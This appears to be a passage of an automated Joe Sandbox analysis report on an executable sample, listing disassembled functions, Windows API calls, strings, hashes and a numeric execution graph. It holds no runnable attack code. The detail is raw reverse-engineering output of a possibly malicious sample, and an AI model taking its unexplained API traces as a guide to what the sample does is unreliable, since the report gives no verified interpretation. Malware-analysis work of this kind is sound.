                                                                          • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                          • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                          • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                          • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                          Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: Window$EnableShowlstrlenwvsprintf
                                                                          • String ID: HideWindow
                                                                          • API String ID: 1249568736-780306582
                                                                          • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                          • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                                          • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                                          • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                                          Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                          • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringlstrcmp
                                                                          • String ID: !N~
                                                                          • API String ID: 623250636-529124213
                                                                          • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                          • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                          • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                          • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                          Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                          • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                          Strings
                                                                          • Error launching installer, xrefs: 00405C48
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID: Error launching installer
                                                                          • API String ID: 3712363035-66219284
                                                                          • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                          • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                          • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                          • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                          Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandlelstrlenwvsprintf
                                                                          • String ID: RMDir: RemoveDirectory invalid input("")
                                                                          • API String ID: 3509786178-2769509956
                                                                          • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                          • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                          • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                          • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                          Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                          • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                          • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                          • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2046019490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2045988378.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046056811.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046098269.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2046207074.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                          Similarity
                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 190613189-0
                                                                          • Opcode ID: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                          • Instruction ID: 82a91399e33c41d3abe84131f59dcd741317d7299bce3ff9d06b8c6e92496674
                                                                          • Opcode Fuzzy Hash: f82830a26d6d2443e283ff34aa02cafdf5392a3ccdb3054c8558e2fdbecc5bb1
                                                                          • Instruction Fuzzy Hash: D5F0CD31205988EFCB019FA9CD04C9FBBA8EF56350B2180AAE840E7310D630EE01DBA4

                                                                          Execution Graph

                                                                          Execution Coverage:4.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:2.1%
                                                                          Total number of Nodes:2000
                                                                          Total number of Limit Nodes:108
                                                                          execution_graph 97743 2d9a6c 97746 2d829c 97743->97746 97745 2d9a78 97747 2d82b4 97746->97747 97754 2d8308 97746->97754 97747->97754 97755 2d53b0 97747->97755 97750 310ed8 97750->97750 97751 2d8331 97751->97745 97752 2d82eb 97752->97751 97783 2d523c 97752->97783 97754->97751 97787 33a48d 89 API calls 4 library calls 97754->97787 97756 2d53cf 97755->97756 97778 2d53fd Mailbox 97755->97778 97864 2f0fe6 97756->97864 97758 2d69fa 97759 2e1c9c 59 API calls 97758->97759 97779 2d5569 Mailbox 97759->97779 97760 327aad 59 API calls 97760->97778 97761 2d69ff 97762 30e691 97761->97762 97763 30f165 97761->97763 97874 33a48d 89 API calls 4 library calls 97762->97874 97882 33a48d 89 API calls 4 library calls 97763->97882 97766 2f0fe6 59 API calls Mailbox 97766->97778 97768 30e6a0 97768->97752 97769 2e1c9c 59 API calls 97769->97778 97771 30ea9a 97875 2e1c9c 97771->97875 97772 2e1207 59 API calls 97772->97778 97775 30eb67 97775->97779 97879 327aad 59 API calls 97775->97879 97776 2f2f70 67 API calls __cinit 97776->97778 97778->97758 97778->97760 97778->97761 97778->97762 97778->97766 97778->97769 97778->97771 97778->97772 97778->97775 97778->97776 97778->97779 97780 30ef28 97778->97780 97782 2d5a1a 97778->97782 97788 2d7e50 97778->97788 97847 2d6e30 97778->97847 97779->97752 97880 33a48d 89 API calls 4 library calls 97780->97880 97881 33a48d 89 API calls 4 library calls 97782->97881 97784 2d524a 97783->97784 97785 2d5250 97783->97785 97784->97785 97786 2e1c9c 59 API calls 97784->97786 97785->97754 97786->97785 97787->97750 97789 2d7e79 97788->97789 97804 2d7ef2 97788->97804 97790 310adf 97789->97790 97792 2d7e90 97789->97792 97798 310b09 97789->97798 97889 34cdc8 277 API calls 2 library calls 97790->97889 97791 310ad3 97888 33a48d 89 API calls 4 library calls 97791->97888 97799 310c37 97792->97799 97811 2d7ea1 97792->97811 97818 2d7eb8 Mailbox 97792->97818 97796 2d53b0 277 API calls 97796->97804 97797 3109e1 97886 2d5190 59 API calls Mailbox 97797->97886 97800 310b3d 97798->97800 97805 310b21 97798->97805 97801 2e1c9c 59 API calls 97799->97801 97800->97790 97891 34a8fd 97800->97891 97801->97818 97802 2d806a 97802->97778 97804->97796 97804->97797 97804->97802 97824 2d8015 97804->97824 97829 2d7fb2 97804->97829 97846 3109e9 97804->97846 97890 33a48d 89 API calls 4 library calls 97805->97890 97807 310d0b 97814 310d41 97807->97814 97982 34c9c9 95 API calls Mailbox 97807->97982 97809 310a33 97813 2e1c9c 59 API calls 97809->97813 97811->97818 97962 327aad 59 API calls 97811->97962 97813->97818 97819 2d523c 59 API calls 97814->97819 97815 310bb7 97918 337ed5 59 API calls 97815->97918 97816 310ce9 97964 2d4d37 97816->97964 97818->97807 97825 2d7ee7 97818->97825 97963 34c87c 85 API calls 2 library calls 97818->97963 97819->97825 97823 310d1f 97826 2d4d37 84 API calls 97823->97826 97835 2d8022 Mailbox 97824->97835 97885 33a48d 89 API calls 4 library calls 97824->97885 97825->97778 97840 310d27 __NMSG_WRITE 97826->97840 97827 310b6b 97898 33789a 97827->97898 97829->97824 97883 2d4230 59 API calls Mailbox 97829->97883 97831 310bc9 97919 2e35b9 59 API calls Mailbox 97831->97919 97834 310bd2 Mailbox 97843 33789a 59 API calls 97834->97843 97835->97809 97835->97818 97884 327aad 59 API calls 97835->97884 97836 310cf1 __NMSG_WRITE 97836->97807 97839 2d523c 59 API calls 97836->97839 97839->97807 97840->97814 97842 2d523c 59 API calls 97840->97842 97842->97814 97844 310beb 97843->97844 97920 2db020 97844->97920 97846->97791 97846->97818 97846->97835 97887 34ccac 277 API calls 97846->97887 97848 2d6e4a 97847->97848 97849 2d6ff7 97847->97849 97848->97849 97850 2d74d0 97848->97850 97852 2d6f2c 97848->97852 97858 2d6fdb 97848->97858 97849->97850 97857 2d7076 97849->97857 97849->97858 97862 2d6fbb Mailbox 97849->97862 97850->97858 98919 2d49e0 59 API calls __gmtime64_s 97850->98919 97855 2d6f68 97852->97855 97852->97857 97852->97858 97854 30fc1e 97859 30fc30 97854->97859 98917 2f3f69 59 API calls __wtof_l 97854->98917 97855->97858 97855->97862 97863 30fa71 97855->97863 97857->97854 97857->97858 97857->97862 98916 327aad 59 API calls 97857->98916 97858->97778 97859->97778 97862->97854 97862->97858 98918 2d41c4 59 API calls Mailbox 97862->98918 97863->97858 98915 2f3f69 59 API calls __wtof_l 97863->98915 97866 2f0fee 97864->97866 97867 2f1008 97866->97867 97869 2f100c std::exception::exception 97866->97869 98920 2f593c 97866->98920 98937 2f35d1 DecodePointer 97866->98937 97867->97778 98938 2f87cb RaiseException 97869->98938 97871 2f1036 98939 2f8701 58 API calls _free 97871->98939 97873 2f1048 97873->97778 97874->97768 97876 2e1caf 97875->97876 97877 2e1ca7 97875->97877 97876->97779 97878 2e1bcc 59 API calls 97877->97878 97878->97876 97879->97779 97880->97782 97881->97779 97882->97779 97883->97824 97884->97835 97885->97797 97886->97846 97887->97846 97888->97790 97889->97818 97890->97825 97892 310b53 97891->97892 97893 34a918 97891->97893 97892->97815 97892->97827 97894 2f0fe6 Mailbox 59 API calls 97893->97894 97897 34a93a 97894->97897 97895 2f0fe6 Mailbox 59 API calls 97895->97897 97897->97892 97897->97895 97983 32715b 59 API calls Mailbox 97897->97983 97899 3378ac 97898->97899 97901 310b8d 97898->97901 97900 2f0fe6 Mailbox 59 API calls 97899->97900 97899->97901 97900->97901 97902 326ebc 97901->97902 97903 326f06 97902->97903 97910 326f1c Mailbox 97902->97910 98008 2e1a36 97903->98008 97904 326f47 98012 34c355 97904->98012 97907 326f5a 97984 2da820 97907->97984 97910->97904 97910->97907 97911 327002 97911->97846 97912 326f91 97913 326fdc 97912->97913 97914 326f53 97912->97914 97916 326fc1 97912->97916 97913->97914 98052 33a48d 89 API calls 4 library calls 97913->98052 98053 326cf1 59 API calls Mailbox 97914->98053 98001 32706d 97916->98001 97918->97831 97919->97834 98343 2e3740 97920->98343 97922 3130b6 98447 33a48d 89 API calls 4 library calls 97922->98447 97925 2db07f 97925->97922 97926 3130d4 97925->97926 97957 2dbb86 97925->97957 97958 2db132 Mailbox _memmove 97925->97958 98448 33a48d 89 API calls 4 library calls 97926->98448 97928 31355e 97961 2db4dd 97928->97961 98478 33a48d 89 API calls 4 library calls 97928->98478 97929 31318a 97929->97961 98450 33a48d 89 API calls 4 library calls 97929->98450 97934 313106 97934->97929 98449 2da9de 277 API calls 97934->98449 97937 2f0fe6 59 API calls Mailbox 97937->97958 97938 32730a 59 API calls 97938->97958 97939 2d3b31 59 API calls 97939->97958 97942 2d53b0 277 API calls 97942->97958 97943 313418 97944 2d53b0 277 API calls 97943->97944 97945 313448 97944->97945 97945->97961 98472 2d39be 97945->98472 97950 3131c3 98451 33a48d 89 API calls 4 library calls 97950->98451 97951 31346f 98476 33a48d 89 API calls 4 library calls 97951->98476 97954 2d523c 59 API calls 97954->97958 97956 2e1c9c 59 API calls 97956->97958 98446 33a48d 89 API calls 4 library calls 97957->98446 97958->97928 97958->97934 97958->97937 97958->97938 97958->97939 97958->97942 97958->97943 97958->97950 97958->97951 97958->97954 97958->97956 97958->97957 97960 2d3c30 68 API calls 97958->97960 97958->97961 98348 2d3add 97958->98348 98355 2dbc70 97958->98355 98434 2d3a40 97958->98434 98445 2d5190 59 API calls Mailbox 97958->98445 98452 326c62 59 API calls 2 library calls 97958->98452 98453 34a9c3 85 API calls Mailbox 97958->98453 98454 326c1e 59 API calls Mailbox 97958->98454 98455 335ef2 68 API calls 97958->98455 98456 2d3ea3 97958->98456 98477 33a12a 59 API calls 97958->98477 97960->97958 97961->97846 97962->97818 97963->97816 97965 2d4d4b 97964->97965 97966 2d4d51 97964->97966 97965->97836 97967 30db28 __i64tow 97966->97967 97968 2d4d99 97966->97968 97970 2d4d57 __itow 97966->97970 97973 30da2f 97966->97973 98913 2f38c8 83 API calls 3 library calls 97968->98913 97972 2f0fe6 Mailbox 59 API calls 97970->97972 97974 2d4d71 97972->97974 97975 2f0fe6 Mailbox 59 API calls 97973->97975 97980 30daa7 Mailbox _wcscpy 97973->97980 97974->97965 97976 2e1a36 59 API calls 97974->97976 97977 30da74 97975->97977 97976->97965 97978 2f0fe6 Mailbox 59 API calls 97977->97978 97979 30da9a 97978->97979 97979->97980 97981 2e1a36 59 API calls 97979->97981 98914 2f38c8 83 API calls 3 library calls 97980->98914 97981->97980 97982->97823 97983->97897 97985 312d51 97984->97985 97988 2da84c 97984->97988 98055 33a48d 89 API calls 4 library calls 97985->98055 97987 312d62 97987->97912 97989 312d6a 97988->97989 97994 2da888 _memmove 97988->97994 98056 33a48d 89 API calls 4 library calls 97989->98056 97991 2da975 97991->97912 97993 2f0fe6 59 API calls Mailbox 97993->97994 97994->97991 97994->97993 97995 312dae 97994->97995 97997 2d53b0 277 API calls 97994->97997 97998 312dc8 97994->97998 98000 2da962 97994->98000 98057 2da9de 277 API calls 97995->98057 97997->97994 97998->97991 98058 33a48d 89 API calls 4 library calls 97998->98058 98000->97991 98054 34a9c3 85 API calls Mailbox 98000->98054 98002 327085 98001->98002 98059 33413a 98002->98059 98062 2dec83 98002->98062 98137 34495b 98002->98137 98146 34f1b2 98002->98146 98003 3270d9 98003->97914 98009 2e1a45 __NMSG_WRITE _memmove 98008->98009 98010 2f0fe6 Mailbox 59 API calls 98009->98010 98011 2e1a83 98010->98011 98011->97910 98013 34c380 98012->98013 98014 34c39a 98012->98014 98338 33a48d 89 API calls 4 library calls 98013->98338 98016 34a8fd 59 API calls 98014->98016 98017 34c3a5 98016->98017 98018 2d53b0 276 API calls 98017->98018 98019 34c406 98018->98019 98020 34c498 98019->98020 98023 34c447 98019->98023 98045 34c392 Mailbox 98019->98045 98021 34c4ee 98020->98021 98022 34c49e 98020->98022 98024 2d4d37 84 API calls 98021->98024 98021->98045 98339 337ed5 59 API calls 98022->98339 98028 33789a 59 API calls 98023->98028 98025 34c500 98024->98025 98029 2e1aa4 59 API calls 98025->98029 98027 34c4c1 98340 2e35b9 59 API calls Mailbox 98027->98340 98031 34c477 98028->98031 98032 34c524 CharUpperBuffW 98029->98032 98034 326ebc 276 API calls 98031->98034 98035 34c53e 98032->98035 98033 34c4c9 Mailbox 98038 2db020 276 API calls 98033->98038 98034->98045 98036 34c545 98035->98036 98037 34c591 98035->98037 98041 33789a 59 API calls 98036->98041 98039 2d4d37 84 API calls 98037->98039 98038->98045 98040 34c599 98039->98040 98341 2d5376 60 API calls 98040->98341 98043 34c573 98041->98043 98044 326ebc 276 API calls 98043->98044 98044->98045 98045->97914 98046 34c5a3 98046->98045 98047 2d4d37 84 API calls 98046->98047 98048 34c5be 98047->98048 98342 2e35b9 59 API calls Mailbox 98048->98342 98050 34c5ce 98051 2db020 276 API calls 98050->98051 98051->98045 98052->97914 98053->97911 98054->97991 98055->97987 98056->97991 98057->97998 98058->97991 98151 33494a GetFileAttributesW 98059->98151 98063 2d4d37 84 API calls 98062->98063 98064 2deca2 98063->98064 98065 2d4d37 84 API calls 98064->98065 98066 2decb7 98065->98066 98067 2d4d37 84 API calls 98066->98067 98068 2decca 98067->98068 98069 2d4d37 84 API calls 98068->98069 98070 2dece0 98069->98070 98155 2e162d 98070->98155 98073 2ded19 98074 315b67 98073->98074 98102 2ded43 __wopenfile 98073->98102 98076 2d47be 59 API calls 98074->98076 98078 315b7a 98076->98078 98077 2def3e 98079 2d47be 59 API calls 98077->98079 98080 2d4540 59 API calls 98078->98080 98082 315d4a 98079->98082 98083 315b8c 98080->98083 98081 2d4d37 84 API calls 98084 2dedca 98081->98084 98085 315d53 98082->98085 98086 315d97 98082->98086 98087 2d43d0 59 API calls 98083->98087 98113 315bb1 98083->98113 98088 2d4d37 84 API calls 98084->98088 98090 2d4540 59 API calls 98085->98090 98089 2d4540 59 API calls 98086->98089 98087->98113 98091 2deddf 98088->98091 98092 315da1 98089->98092 98095 315d5e 98090->98095 98091->98077 98164 2d47be 98091->98164 98096 2d43d0 59 API calls 98092->98096 98094 315c0f 98094->98077 98104 2d4540 59 API calls 98094->98104 98097 2d4d37 84 API calls 98095->98097 98099 315dbd 98096->98099 98101 315d70 98097->98101 98111 2d4d37 84 API calls 98099->98111 98100 2d477a 59 API calls 98100->98113 98191 2e1364 59 API calls 2 library calls 98101->98191 98102->98077 98102->98081 98102->98094 98127 2dee30 __wopenfile 98102->98127 98108 315c76 98104->98108 98106 2dee09 98170 2d4540 98106->98170 98107 2d43d0 59 API calls 98107->98113 98114 2d43d0 59 API calls 98108->98114 98109 315d84 98115 2d477a 59 API calls 98109->98115 98118 315dd8 98111->98118 98113->98100 98113->98107 98124 2def0c Mailbox 98113->98124 98189 2e1364 59 API calls 2 library calls 98113->98189 98114->98127 98116 315d92 98115->98116 98123 2d43d0 59 API calls 98116->98123 98192 2e1364 59 API calls 2 library calls 98118->98192 98121 2d477a 59 API calls 98121->98127 98122 315dec 98125 2d477a 59 API calls 98122->98125 98123->98124 98124->98003 98125->98116 98127->98121 98127->98124 98128 315cc2 98127->98128 98179 2e1364 59 API calls 2 library calls 98127->98179 98180 2d43d0 98127->98180 98129 315cfb 98128->98129 98130 315cec 98128->98130 98160 2d477a 98129->98160 98190 2e153b 59 API calls 2 library calls 98130->98190 98134 2d43d0 59 API calls 98135 315d1c 98134->98135 98136 2e19e1 59 API calls 98135->98136 98136->98077 98138 2f0fe6 Mailbox 59 API calls 98137->98138 98139 34496c 98138->98139 98204 2e433f 98139->98204 98142 2d4d37 84 API calls 98143 34498d GetEnvironmentVariableW 98142->98143 98207 337a51 59 API calls Mailbox 98143->98207 98145 3449aa 98145->98003 98147 2d4d37 84 API calls 98146->98147 98148 34f1cf 98147->98148 98208 334148 CreateToolhelp32Snapshot Process32FirstW 98148->98208 98150 34f1de 98150->98003 98152 33413f 98151->98152 98153 334965 FindFirstFileW 98151->98153 98152->98003 98153->98152 98154 33497a FindClose 98153->98154 98154->98152 98156 2f0fe6 Mailbox 59 API calls 98155->98156 98157 2e1652 98156->98157 98158 2f0fe6 Mailbox 59 API calls 98157->98158 98159 2decf4 98158->98159 98159->98073 98163 2d502b 59 API calls 98159->98163 98161 2f0fe6 Mailbox 59 API calls 98160->98161 98162 2d4787 98161->98162 98162->98134 98163->98073 98165 2d47c6 98164->98165 98166 2f0fe6 Mailbox 59 API calls 98165->98166 98167 2d47d4 98166->98167 98168 2d47e0 98167->98168 98193 2d46ec 59 API calls Mailbox 98167->98193 98168->98094 98168->98106 98194 2d4650 98170->98194 98172 2d454f 98173 2f0fe6 Mailbox 59 API calls 98172->98173 98174 2d45eb 98172->98174 98173->98174 98175 2e19e1 98174->98175 98176 2e19fb 98175->98176 98178 2e19ee 98175->98178 98177 2f0fe6 Mailbox 59 API calls 98176->98177 98177->98178 98178->98127 98179->98127 98181 30d6c9 98180->98181 98186 2d43e7 98180->98186 98181->98186 98203 2d40cb 59 API calls Mailbox 98181->98203 98183 2d44e8 98187 2f0fe6 Mailbox 59 API calls 98183->98187 98184 2d4530 98185 2d523c 59 API calls 98184->98185 98188 2d44ef 98185->98188 98186->98183 98186->98184 98186->98188 98187->98188 98188->98127 98189->98113 98190->98077 98191->98109 98192->98122 98193->98168 98195 2d4659 Mailbox 98194->98195 98196 30d6ec 98195->98196 98201 2d4663 98195->98201 98197 2f0fe6 Mailbox 59 API calls 98196->98197 98199 30d6f8 98197->98199 98198 2d466a 98198->98172 98201->98198 98202 2d5190 59 API calls Mailbox 98201->98202 98202->98201 98203->98186 98205 2f0fe6 Mailbox 59 API calls 98204->98205 98206 2e4351 98205->98206 98206->98142 98207->98145 98218 334ce2 98208->98218 98210 334195 Process32NextW 98211 334244 FindCloseChangeNotification 98210->98211 98217 33418e Mailbox 98210->98217 98211->98150 98212 2e1207 59 API calls 98212->98217 98213 2e1a36 59 API calls 98213->98217 98217->98210 98217->98211 98217->98212 98217->98213 98224 2f0119 98217->98224 98275 2e17e0 98217->98275 98284 2e151f 61 API calls 98217->98284 98219 334d09 98218->98219 98222 334cf0 98218->98222 98286 2f37c3 59 API calls __wcstoi64 98219->98286 98222->98219 98223 334d0f 98222->98223 98285 2f385c GetStringTypeW _iswctype 98222->98285 98223->98217 98287 2e1207 98224->98287 98227 2e1207 59 API calls 98228 2f0137 98227->98228 98229 2e1207 59 API calls 98228->98229 98230 2f013f 98229->98230 98231 2e1207 59 API calls 98230->98231 98232 2f0147 98231->98232 98233 2f017b 98232->98233 98234 32627d 98232->98234 98235 2e1462 59 API calls 98233->98235 98236 2e1c9c 59 API calls 98234->98236 98237 2f0189 98235->98237 98238 326286 98236->98238 98305 2e1981 98237->98305 98240 2e19e1 59 API calls 98238->98240 98244 2f01be 98240->98244 98241 2f0193 98243 2e1462 59 API calls 98241->98243 98241->98244 98242 2f01fe 98292 2e1462 98242->98292 98246 2f01b4 98243->98246 98244->98242 98247 2f01dd 98244->98247 98256 3262a6 98244->98256 98248 2e1981 59 API calls 98246->98248 98309 2e1609 98247->98309 98248->98244 98249 326376 98252 2e1821 59 API calls 98249->98252 98251 2f020f 98254 2f0221 98251->98254 98257 2e1c9c 59 API calls 98251->98257 98270 326333 98252->98270 98255 2f0231 98254->98255 98258 2e1c9c 59 API calls 98254->98258 98260 2f0238 98255->98260 98262 2e1c9c 59 API calls 98255->98262 98256->98249 98259 32635f 98256->98259 98268 3262dd 98256->98268 98257->98254 98258->98255 98259->98249 98264 32634a 98259->98264 98263 2e1c9c 59 API calls 98260->98263 98272 2f023f Mailbox 98260->98272 98261 2e1462 59 API calls 98261->98242 98262->98260 98263->98272 98267 2e1821 59 API calls 98264->98267 98265 32633b 98266 2e1821 59 API calls 98265->98266 98266->98270 98267->98270 98268->98265 98273 326326 98268->98273 98269 2e1609 59 API calls 98269->98270 98270->98242 98270->98269 98321 2e153b 59 API calls 2 library calls 98270->98321 98272->98217 98312 2e1821 98273->98312 98276 31f401 98275->98276 98277 2e17f2 98275->98277 98337 3287f9 59 API calls _memmove 98276->98337 98331 2e1680 98277->98331 98280 2e17fe 98280->98217 98281 31f40b 98282 2e1c9c 59 API calls 98281->98282 98283 31f413 Mailbox 98282->98283 98284->98217 98285->98222 98286->98223 98288 2f0fe6 Mailbox 59 API calls 98287->98288 98289 2e1228 98288->98289 98290 2f0fe6 Mailbox 59 API calls 98289->98290 98291 2e1236 98290->98291 98291->98227 98293 2e14ce 98292->98293 98294 2e1471 98292->98294 98295 2e1981 59 API calls 98293->98295 98294->98293 98296 2e147c 98294->98296 98297 2e149f _memmove 98295->98297 98298 2e1497 98296->98298 98299 31f1de 98296->98299 98297->98251 98322 2e1b7c 59 API calls Mailbox 98298->98322 98323 2e1c7e 